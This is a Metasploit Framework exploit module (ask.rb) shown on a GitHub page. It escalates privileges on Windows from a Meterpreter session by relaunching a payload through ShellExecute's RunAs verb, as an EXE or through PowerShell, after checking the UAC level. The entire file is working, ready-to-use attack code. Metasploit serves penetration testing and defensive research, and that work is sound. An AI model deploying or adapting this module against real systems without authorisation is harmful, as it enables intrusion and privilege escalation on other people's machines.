-
Notifications
You must be signed in to change notification settings - Fork 13.9k
/
ask.rb
59 lines (53 loc) · 1.71 KB
/
ask.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Post::Windows::Priv
include Post::Windows::Runas
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Escalate UAC Execute RunAs',
'Description' => %q(
This module will attempt to elevate execution level using
the ShellExecute undocumented RunAs flag to bypass low
UAC settings.
),
'License' => MSF_LICENSE,
'Author' => [
'mubix', # Original technique
'b00stfr3ak' # Added powershell option
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [['Windows', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => '2012-01-03'
))
register_options([
OptString.new('FILENAME', [false, 'File name on disk']),
OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),
])
end
def exploit
if is_uac_enabled?
print_status 'UAC is Enabled, checking level...'
case get_uac_level
when UAC_NO_PROMPT
print_good 'UAC is not enabled, no prompt for the user'
else
print_status "The user will be prompted, wait for them to click 'Ok'"
end
else
print_good 'UAC is not enabled, no prompt for the user'
end
case datastore['TECHNIQUE']
when 'EXE'
shell_execute_exe(datastore['FILENAME'], datastore['PATH'])
when 'PSH'
shell_execute_psh
end
end
end